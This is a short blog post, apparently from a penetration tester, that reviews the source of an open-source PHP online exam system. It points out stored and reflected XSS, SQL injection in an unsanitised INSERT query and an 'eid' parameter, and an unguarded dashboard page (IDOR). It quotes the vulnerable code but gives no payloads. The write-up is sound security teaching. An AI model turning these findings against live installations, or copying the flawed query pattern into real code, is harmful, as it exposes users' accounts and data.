ninja at @prismacsi- human rights activist

Source Code Analysis 101

Before Start

I hope covid19 pandemic as soon as possible finished in the world. Whatever. During the penetration test, pentester tries understand how to work web application. I think this is the most important rule. Because if pentester understand web application can be find vulnerability. Therefore if tested web application is open source everything will be easy

Online Exam System

This system was recently used by my university. Do not be afraid! I only got 50 from the exam. We need be to ethical

Vendor Homepage:

Software Link:

I cloned application in my local and we can start !

In the picture above we have seen that the webapp has the registration form for students. We can start by analysis here.

WebApp get the user information in index.php file and send via POST method the signin.php file. I open the signin.php file.

In sing.php the content is as in the picture above. Before we look for vulnerability, let’s look at what some of the functions that the developer uses.

ucwords = capitalizes the first letter of each word.

strtolower = used to lower case all content in a variable.

stripslashes = function is used to clear the backslash () sign at a value

addslashes = A backslash is applied in front of special characters in a string, such as db queries.

These filters will be no solution for Stored XSS vulnerability. This is the first vuln we found. Then we will see how we can hijack the cookie of the admin.

After all these filters, the variables are queried below with insert into

$q3=mysqli_query($con,"INSERT INTO user VALUES  ('$name' , '$gender' , '$college','$email' ,'$mob', '$password')");

Some mysql database versions reverse slash is not important. Also we can say this code affected sql injection vulnerability. BUT!

I am not recommended exploit sqli here. Database can be very stress because in the query here “insert into”

We registered web app, and will be review the user panel

Lets start analysis account.php file. Here have a Reflected XSS

 <!--alert message-->
<?php if(@$_GET['w'])
<!--alert message end-->

sometimes it’s so hard to understand the developer :(

Start during exam eid value affected union based sql inj

I want to analysis at the dash.php file

Developer not check user. All user can be review dash.php file. Can we say this vulnerability IDOR (insecure direct object references)

We started with basic web application. This first post for series. Thank you for reading

Follow me with twitter @berkdusunur